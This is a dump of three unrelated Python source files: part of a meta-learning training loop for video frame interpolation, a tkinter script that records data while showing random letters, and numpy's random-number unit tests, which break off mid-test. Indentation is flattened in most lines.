filtered_params = filter(lambda p: p.requires_grad, model.parameters())
optimizer.zero_grad()
grads = torch.autograd.grad(total_loss, list(filtered_params)) # backward on weights_before: FO-MAML
j = 0
#print('[before update]')
#print(list(model.parameters())[45][-1])
for _i, param in enumerate(model.parameters()):
if param.requires_grad:
#param = param - outerstepsize * grads[j]
param.grad = grads[j]
j += 1
optimizer.step()
#print('[after optim.step]')
#print(list(model.parameters())[45][-1])
batch_time.update(time.time() - _t)
_t = time.time()
if i % 100 == 0: #max(1, int(int(len(train_set) / args.batch_size )/500.0)) == 0:
print("Ep[%s][%05d/%d] Time: %.2f Pix: %s TV: %s Sym: %s Total: %s Avg. Loss: %s" % (
str(t), i, int(len(train_set)) // args.batch_size,
batch_time.avg,
str([round(x.item(),5) for x in pixel_loss]),
str([round(x.item(),4) for x in offset_loss]),
str([round(x.item(), 4) for x in sym_loss]),
str([round(x.item(),5) for x in [total_loss]]),
str([round(training_losses.avg, 5)]) ))
batch_time.reset()
if t == 1:
# delete the pre validation weights for cleaner workspace
if os.path.exists(args.save_path + "/epoch" + str(0) +".pth" ):
os.remove(args.save_path + "/epoch" + str(0) +".pth")
if os.path.exists(args.save_path + "/epoch" + str(t-1) +".pth"):
os.remove(args.save_path + "/epoch" + str(t-1) +".pth")
torch.save(model.state_dict(), args.save_path + "/epoch" + str(t) +".pth")
# print("\t\t**************Start Validation*****************")
#Turn into evaluation mode
val_total_losses = AverageMeter()
val_total_pixel_loss = AverageMeter()
val_total_PSNR_loss = AverageMeter()
val_total_tv_loss = AverageMeter()
val_total_pws_loss = AverageMeter()
val_total_sym_loss = AverageMeter()
for i, (images, imgpaths) in enumerate(tqdm(val_loader)):
#if i < 50: #i < 11 or (i > 14 and i < 50):
# continue
if i >= min(VAL_ITER_CUT, int(len(test_set)/ args.batch_size)):
break
if args.use_cuda:
images = [im.cuda() for im in images]
#X0, y, X1 = images[0], images[1], images[2]
#X0, y, X1 = images[2], images[3], images[4]
# define optimizer to update the inner loop
inner_optimizer = torch.optim.Adamax(model.rectifyNet.parameters(),
lr=args.inner_lr, betas=(0.9, 0.999), eps=1e-8, weight_decay=args.weight_decay)
# Reptile testing - save base model weights
weights_base = copy.deepcopy(model.state_dict())
k = args.num_inner_update # 2
model.train()
for _k in range(k):
indices = [ [0, 2, 4], [2, 4, 6] ]
ind = indices[_k % 2]
meta_X0, meta_y, meta_X1 = crop(images[ind[0]]), crop(images[ind[1]]), crop(images[ind[2]])
diffs, offsets, filters, occlusions, _ = model(torch.stack((meta_X0, meta_y, meta_X1), dim=0))
pixel_loss, offset_loss, sym_loss = part_loss(diffs, offsets, occlusions, [meta_X0, meta_X1], epsilon=args.epsilon)
total_loss = sum(x*y if x > 0 else 0 for x,y in zip(args.alpha, pixel_loss))
inner_optimizer.zero_grad()
total_loss.backward()
inner_optimizer.step()
# Actual target validation performance
with torch.no_grad():
if args.datasetName == 'Vimeo_90K_sep':
X0, y, X1 = images[2], images[3], images[4]
#diffs, offsets,filters,occlusions = model(torch.stack((X0,y,X1),dim = 0))
diffs, offsets,filters,occlusions, output = model(torch.stack((X0,y,X1),dim = 0))
pixel_loss, offset_loss,sym_loss = part_loss(diffs, offsets, occlusions, [X0,X1],epsilon=args.epsilon)
val_total_loss = sum(x * y for x, y in zip(args.alpha, pixel_loss))
per_sample_pix_error = torch.mean(torch.mean(torch.mean(diffs[args.save_which] ** 2, dim=1), dim=1), dim=1)
per_sample_pix_error = per_sample_pix_error.data # extract tensor
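                    # PSNR = 20*log10(1/RMSE) = -10*log10(MSE), computed per sample and then averaged over the batch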
psnr_loss = torch.mean(20 * torch.log(1.0/torch.sqrt(per_sample_pix_error)))/torch.log(torch.Tensor([10]))
val_total_losses.update(val_total_loss.item(),args.batch_size)
val_total_pixel_loss.update(pixel_loss[args.save_which].item(), args.batch_size)
val_total_tv_loss.update(offset_loss[0].item(), args.batch_size)
val_total_sym_loss.update(sym_loss[0].item(), args.batch_size)
val_total_PSNR_loss.update(psnr_loss[0],args.batch_size)
else: # HD_dataset testing
for j in range(len(images) // 2):
mH, mW = 720, 1280
X0, y, X1 = crop(images[2*j], maxH=mH, maxW=mW), crop(images[2*j+1], maxH=mH, maxW=mW), crop(images[2*j+2], maxH=mH, maxW=mW)
diffs, offsets,filters,occlusions , output = model(torch.stack((X0,y,X1),dim = 0))
pixel_loss, offset_loss,sym_loss = part_loss(diffs, offsets, occlusions, [X0,X1],epsilon=args.epsilon)
val_total_loss = sum(x * y for x, y in zip(args.alpha, pixel_loss))
per_sample_pix_error = torch.mean(torch.mean(torch.mean(diffs[args.save_which] ** 2, dim=1), dim=1), dim=1)
per_sample_pix_error = per_sample_pix_error.data # extract tensor
psnr_loss = torch.mean(20 * torch.log(1.0/torch.sqrt(per_sample_pix_error)))/torch.log(torch.Tensor([10]))
val_total_losses.update(val_total_loss.item(),args.batch_size)
val_total_pixel_loss.update(pixel_loss[args.save_which].item(), args.batch_size)
val_total_tv_loss.update(offset_loss[0].item(), args.batch_size)
val_total_sym_loss.update(sym_loss[0].item(), args.batch_size)
val_total_PSNR_loss.update(psnr_loss[0],args.batch_size)
# Reset model to its base weights
model.load_state_dict(weights_base)
#del weights_base, inner_optimizer, meta_X0, meta_y, meta_X1, X0, y, X1, pixel_loss, offset_loss, sym_loss, total_loss, val_total_loss, diffs, offsets, filters, occlusions
VIZ = False
exp_name = 'meta_test'
if VIZ:
for b in range(images[0].size(0)):
imgpath = imgpaths[0][b]
savepath = os.path.join('checkpoint', exp_name, 'vimeoSeptuplet', imgpath.split('/')[-3], imgpath.split('/')[-2])
if not os.path.exists(savepath):
os.makedirs(savepath)
img_pred = (output[b].data.permute(1, 2, 0).clamp_(0, 1).cpu().numpy()[..., ::-1] * 255).astype(numpy.uint8)
cv2.imwrite(os.path.join(savepath, 'im2_pred.png'), img_pred)
''' # Original validation (not meta)
with torch.no_grad():
if args.use_cuda:
images = [im.cuda() for im in images]
#X0, y, X1 = images[0], images[1], images[2]
X0, y, X1 = images[2], images[3], images[4]
#diffs, offsets,filters,occlusions = model(torch.stack((X0,y,X1),dim = 0))
pixel_loss, offset_loss,sym_loss = part_loss(diffs, offsets, occlusions, [X0,X1],epsilon=args.epsilon)
val_total_loss = sum(x * y for x, y in zip(args.alpha, pixel_loss))
per_sample_pix_error = torch.mean(torch.mean(torch.mean(diffs[args.save_which] ** 2,
dim=1),dim=1),dim=1)
per_sample_pix_error = per_sample_pix_error.data # extract tensor
psnr_loss = torch.mean(20 * torch.log(1.0/torch.sqrt(per_sample_pix_error)))/torch.log(torch.Tensor([10]))
#
val_total_losses.update(val_total_loss.item(),args.batch_size)
val_total_pixel_loss.update(pixel_loss[args.save_which].item(), args.batch_size)
val_total_tv_loss.update(offset_loss[0].item(), args.batch_size)
val_total_sym_loss.update(sym_loss[0].item(), args.batch_size)
val_total_PSNR_loss.update(psnr_loss[0],args.batch_size)
print(".",end='',flush=True)
'''
print("\nEpoch " + str(int(t)) +
"\tlearning rate: " + str(float(ikk['lr'])) +
"\tAvg Training Loss: " + str(round(training_losses.avg,5)) +
"\tValidate Loss: " + str([round(float(val_total_losses.avg), 5)]) +
"\tValidate PSNR: " + str([round(float(val_total_PSNR_loss.avg), 5)]) +
"\tPixel Loss: " + str([round(float(val_total_pixel_loss.avg), 5)]) +
"\tTV Loss: " + str([round(float(val_total_tv_loss.avg), 4)]) +
"\tPWS Loss: " + str([round(float(val_total_pws_loss.avg), 4)]) +
"\tSym Loss: " + str([round(float(val_total_sym_loss.avg), 4)])
)
auxiliary_data.append([t, float(ikk['lr']),
training_losses.avg, val_total_losses.avg, val_total_pixel_loss.avg,
val_total_tv_loss.avg,val_total_pws_loss.avg,val_total_sym_loss.avg])
numpy.savetxt(args.log, numpy.array(auxiliary_data), fmt='%.8f', delimiter=',')
training_losses.reset()
#original_training_losses.reset()
print("\t\tFinished an epoch, Check and Save the model weights")
# we check the validation loss instead of training loss. OK~
if saved_total_loss >= val_total_losses.avg:
saved_total_loss = val_total_losses.avg
torch.save(model.state_dict(), args.save_path + "/best"+".pth")
print("\t\tBest Weights updated for decreased validation loss\n")
else:
print("\t\tWeights Not updated for undecreased validation loss\n")
        # schedule the learning rate
scheduler.step(val_total_losses.avg)
print("*********Finish Training********")
if __name__ == '__main__':
    sys.setrecursionlimit(100000)  # avoid a 0xC00000FD (stack overflow) exception from the recursive detach of gradients
    threading.stack_size(200000000)  # avoid a 0xC00000FD (stack overflow) exception from the recursive detach of gradients
thread = threading.Thread(target=train)
thread.start()
thread.join()
exit(0)
|
short_letter_data.py
|
# Run this file to collect data while the subject is exposed to a random letter
from data import *
from tkinter import *
import os
import random as r
import threading
import numpy as np
# Set values for data
wait_time = 1000 # How long to wait in between exposures
expose_time = 1000 # How long letter should be exposed
# Letters to be sampled
# samples = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
# 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
samples = ['A', 'B']
# Set dimensions
w = 900
h = 556
root = Tk()
root.geometry(str(w)+'x'+str(h))
root.title('Letter Viewer')
graphing_area = Canvas(root, width=w, height=h)
graphing_area.pack()
# Display the letter to be thought of and toggle the saving flag
def display_letter(canvas, frame, wait):
canvas.delete('all')
if wait:
file_list = []
for name in os.listdir(path[:-1]):
if name[0] == save_info[1]:
file_list.append(int(name[1:-4]))
if len(file_list) < 1:
code = 0
else:
code = max(file_list) + 1
if len(save_info[2]) >= 500:
np.savetxt(path+save_info[1]+str(code)+'.csv', np.array(save_info[2][:500]), delimiter=',')
else:
pass
letter = samples[r.randint(0, len(samples) - 1)]
canvas.create_text(w/2, h/2, font="Arial "+str(int(round(h/3, 0))), text=letter, anchor='center')
        # Reset the buffer for the upcoming exposure; collection resumes once saving is re-enabled below
save_info[0] = False
save_info[1] = letter.lower()
save_info[2] = []
frame.after(wait_time, display_letter, canvas, frame, False)
else:
save_info[0] = True
frame.after(expose_time, display_letter, canvas, frame, True)
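# Exposure cycle (summary of the callback above): each pass draws a fresh random letter and
# pauses sampling for wait_time ms, then enables sampling (save_info[0] = True) for
# expose_time ms; on the next pass, if at least 500 samples were collected, the first 500
# are written to '<letter><index>.csv' before a new letter is drawn.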
thread = threading.Thread(target=data_loop, args=[False, False, False, 1, True])
thread.start()
graphing_area.create_text(w/2, h/2, font="Arial "+str(int(round(h/3, 0))), text='Loading...', anchor='center')
root.after(10000, display_letter, graphing_area, root, True)
root.mainloop()
|
test_random.py
|
from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.testing import (
TestCase, run_module_suite, assert_, assert_raises, assert_equal,
assert_warns)
from numpy import random
from numpy.compat import asbytes
import sys
import warnings
class TestSeed(TestCase):
def test_scalar(self):
s = np.random.RandomState(0)
assert_equal(s.randint(1000), 684)
s = np.random.RandomState(4294967295)
assert_equal(s.randint(1000), 419)
def test_array(self):
s = np.random.RandomState(range(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState(np.arange(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState([0])
assert_equal(s.randint(1000), 973)
s = np.random.RandomState([4294967295])
assert_equal(s.randint(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, -0.5)
assert_raises(ValueError, np.random.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, [-0.5])
assert_raises(ValueError, np.random.RandomState, [-1])
assert_raises(ValueError, np.random.RandomState, [4294967296])
assert_raises(ValueError, np.random.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, np.random.RandomState, [1, -2, 4294967296])
class TestBinomial(TestCase):
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
np.testing.assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial(TestCase):
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.randint(-5, -1) < -1)
x = random.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, np.random.multinomial, 1, p,
np.float(1))
class TestSetState(TestCase):
def setUp(self):
self.seed = 1234567890
self.prng = random.RandomState(self.seed)
self.state = self.prng.get_state()
def test_basic(self):
old = self.prng.tomaxint(16)
self.prng.set_state(self.state)
new = self.prng.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.prng.standard_normal(size=3)
self.prng.set_state(self.state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.prng.standard_normal()
state = self.prng.get_state()
old = self.prng.standard_normal(size=3)
self.prng.set_state(state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
old_state = self.state[:-2]
x1 = self.prng.standard_normal(size=16)
self.prng.set_state(old_state)
x2 = self.prng.standard_normal(size=16)
self.prng.set_state(self.state)
x3 = self.prng.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.prng.negative_binomial(0.5, 0.5)
class TestRandint(TestCase):
rfunc = np.random.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=np.float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_in_bounds_fuzz(self):
# Don't use fixed seed
np.random.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
import hashlib
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but np.bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': '7dd3170d7aa461d201a65f8bcf3944b0',
'int16': '1b7741b80964bb190c50d541dca1cac1',
'int32': '4dc9fcc2b395577ebb51793e58ed1a05',
'int64': '17db902806f448331b5a758d7d2ee672',
'int8': '27dd30c4e08a797063dffac2490b0be6',
'uint16': '1b7741b80964bb190c50d541dca1cac1',
'uint32': '4dc9fcc2b395577ebb51793e58ed1a05',
'uint64': '17db902806f448331b5a758d7d2ee672',
'uint8': '27dd30c4e08a797063dffac2490b0be6'}
for dt in self.itype[1:]:
np.random.seed(1234)
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
        # bools do not depend on endianness
np.random.seed(1234)
val = self.rfunc(0, 2, size=1000, dtype=np.bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(np.bool).name] == res)
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
self.assertEqual(sample.dtype, np.dtype(dt))
for dt in (np.bool, np.int, np.long):
lbnd = 0 if dt is np.bool else np.iinfo(dt).min
ubnd = 2 if dt is np.bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
self.assertFalse(hasattr(sample, 'dtype'))
self.assertEqual(type(sample), dt)
class TestRandomDist(TestCase):
# Make sure the random distribution returns the correct value for a
# given seed
def setUp(self):
self.seed = 1234567890
def test_rand(self):
np.random.seed(self.seed)
actual = np.random.rand(3, 2)
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
np.random.seed(self.seed)
actual = np.random.randn(3, 2)
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_randint(self):
np.random.seed(self.seed)
actual = np.random.randint(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
np.testing.assert_array_equal(actual, desired)
def test_random_integers(self):
np.random.seed(self.seed)
actual = np.random.random_integers(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
np.testing.assert_array_equal(actual, desired)
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
actual = np.random.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
desired = np.iinfo('l').max
np.testing.assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random_sample(self):
np.random.seed(self.seed)
actual = np.random.random_sample((3, 2))
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_choice_uniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
np.testing.assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
np.testing.assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
np.testing.assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False,
p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
np.testing.assert_array_equal(actual, desired)
def test_choice_noninteger(self):
np.random.seed(self.seed)
actual = np.random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['c', 'd', 'c', 'd'])
np.testing.assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = np.random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2, replace=False,
p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(np.random.choice(2, replace=True)))
assert_(np.isscalar(np.random.choice(2, replace=False)))
assert_(np.isscalar(np.random.choice(2, replace=True, p=p)))
assert_(np.isscalar(np.random.choice(2, replace=False, p=p)))
assert_(np.isscalar(np.random.choice([1, 2], replace=True)))
assert_(np.random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(np.random.choice(2, s, replace=True)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False)))
assert_(not np.isscalar(np.random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(np.random.choice([1, 2], s, replace=True)))
assert_(np.random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_(np.random.choice(6, s, replace=True).shape, s)
assert_(np.random.choice(6, s, replace=False).shape, s)
assert_(np.random.choice(6, s, replace=True, p=p).shape, s)
assert_(np.random.choice(6, s, replace=False, p=p).shape, s)
assert_(np.random.choice(np.arange(6), s, replace=True).shape, s)
def test_bytes(self):
np.random.seed(self.seed)
actual = np.random.bytes(10)
desired = asbytes('\x82Ui\x9e\xff\x97+Wf\xa5')
np.testing.assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, 1),
("b", np.int32, 1)])]:
np.random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
np.random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
np.testing.assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5,4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
np.random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
np.random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_beta(self):
np.random.seed(self.seed)
actual = np.random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
np.random.seed(self.seed)
actual = np.random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[37, 43],
[42, 48],
[46, 45]])
np.testing.assert_array_equal(actual, desired)
def test_chisquare(self):
np.random.seed(self.seed)
actual = np.random.chisquare(50, size=(3, 2))
desired = np.array([[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006]])
np.testing.assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
np.random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = np.random.mtrand.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598]],
[[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688]],
[[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799]]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, np.random.dirichlet, p, np.float(1))
def test_exponential(self):
np.random.seed(self.seed)
actual = np.random.exponential(1.1234, size=(3, 2))
desired = np.array([[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_f(self):
np.random.seed(self.seed)
actual = np.random.f(12, 77, size=(3, 2))
desired = np.array([[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
np.random.seed(self.seed)
actual = np.random.gamma(5, 3, size=(3, 2))
desired = np.array([[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011]])
np.testing.assert_array_almost_equal(actual, desired, decimal=14)
def test_geometric(self):
np.random.seed(self.seed)
actual = np.random.geometric(.123456789, size=(3, 2))
desired = np.array([[8, 7],
[17, 17],
[5, 12]])
np.testing.assert_array_equal(actual, desired)
def test_gumbel(self):
np.random.seed(self.seed)
actual = np.random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_hypergeometric(self):
np.random.seed(self.seed)
actual = np.random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[10, 10],
[10, 10],
[9, 9]])
np.testing.assert_array_equal(actual, desired)
# Test nbad = 0
actual = np.random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
np.testing.assert_array_equal(actual, desired)
actual = np.random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
np.testing.assert_array_equal(actual, desired)
# Test ngood = 0
actual = np.random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
np.testing.assert_array_equal(actual, desired)
actual = np.random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
np.testing.assert_array_equal(actual, desired)
def test_laplace(self):
np.random.seed(self.seed)
actual = np.random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_logistic(self):
np.random.seed(self.seed)
actual = np.random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332]])
np.testing.assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
np.random.seed(self.seed)
actual = np.random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273]])
np.testing.assert_array_almost_equal(actual, desired, decimal=13)
def test_logseries(self):
np.random.seed(self.seed)
actual = np.random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[2, 2],
[6, 17],
[3, 6]])
np.testing.assert_array_equal(actual, desired)
def test_multinomial(self):
np.random.seed(self.seed)
actual = np.random.multinomial(20, [1/6.]*6, size=(3, 2))
desired = np.array([[[4, 3, 5, 4, 2, 2],
